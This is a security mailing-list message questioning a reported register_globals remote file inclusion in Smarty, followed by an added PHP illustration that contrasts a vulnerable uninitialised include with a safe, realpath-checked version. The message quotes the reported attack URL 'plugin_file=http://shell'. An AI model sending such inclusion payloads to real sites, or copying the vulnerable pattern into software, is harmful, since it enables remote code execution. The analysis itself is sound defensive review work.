Hi Thomas! Have you managed to reproduce this, even with Smarty in the webroot and register_globals enabled? Your report mentions _get_plugin_filepath, but that does seem to be a different vector than the one described in the original report. $type and $name cannot be spoofed with register_globals, as those are function arguments. Moreover, in most cases where _get_plugin_filepath is called, both arguments are fixed strings or values read from the (trusted) file.
The reported attack vector is:

Smarty_Compiler.class.php?plugin_file=http://shell

However, $plugin_file is always initialized before use in Smarty_Compiler.class.php. Is the original report bogus, or does HYIP use some old or customized Smarty version? (Well, I guess you don't know the real answer to this, just like me ;).

-- 
Tomas Hoger
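As an added illustration of the point made in the message above (example code written for this page, not part of the thread and not Smarty's own source), the following PHP contrasts the shape of the reported register_globals vector, a variable that is only assigned on one branch before reaching include(), with the pattern the message describes, unconditional initialisation before use. The variable names, the plugins/ layout and the helper resolve_plugin_file() are constructed for the example; $type and $name stand in for the trusted values the message mentions, not for request input.

```php
<?php
/*
 * Added illustration for the message above. Not Smarty's code and not its
 * file layout: $plugin_file, $plugins_dir, the "type.name.php" naming scheme
 * and resolve_plugin_file() are constructed for this example.
 *
 * With register_globals=On, PHP seeds file-scope variables from the request
 * before the script body runs, so a script reachable directly under the
 * webroot behaves as if it began with
 *     $plugin_file = $_GET['plugin_file'];   // when the parameter is sent
 * The seeded value only matters where the script reads a variable on some
 * path without having assigned it first.
 */

$plugins_dir = __DIR__ . '/plugins';

// Constructed trusted inputs: in the scenario the message describes these are
// function arguments or values read from the compiled template, not request data.
$type = 'function';
$name = 'html_options';

/* Pattern A, the shape of the reported vector: $plugin_file is assigned on one
 * branch only. On any other branch the value reaching include() would be the
 * register_globals-seeded one, and with allow_url_fopen/allow_url_include
 * enabled it could even name a remote file. */
if ($type === 'function') {
    $plugin_file = "$plugins_dir/function.$name.php";
}
// include $plugin_file;   // defect: uninitialised whenever $type !== 'function'

/* Pattern B, what the message says Smarty_Compiler.class.php does: the
 * variable is initialised unconditionally before use, so whatever
 * register_globals seeded is overwritten and the request cannot choose the
 * path. The realpath() containment check is extra hardening (an assumption of
 * this example, not something the message attributes to Smarty) for the case
 * where $name could ever carry "../" or a stream wrapper prefix. */
function resolve_plugin_file(string $plugins_dir, string $type, string $name): ?string
{
    $plugin_file = null;                                  // always initialised
    if ($type === 'function' || $type === 'modifier' || $type === 'block') {
        $plugin_file = "$plugins_dir/$type.$name.php";
    }
    if ($plugin_file === null) {
        return null;                                      // unknown plugin type
    }
    $real = realpath($plugin_file);
    $base = realpath($plugins_dir);
    // Reject anything that does not resolve to an existing file inside $plugins_dir.
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0 || !is_file($real)) {
        return null;
    }
    return $real;
}

$plugin_file = resolve_plugin_file($plugins_dir, $type, $name);
if ($plugin_file !== null) {
    include $plugin_file;
}
```

The useful check when auditing a report like the one discussed is therefore not whether a variable name appears in the file, but whether every path to the include() assigns that variable first; if it does, register_globals cannot influence the included path, and the remaining review effort goes into where $type and $name actually come from.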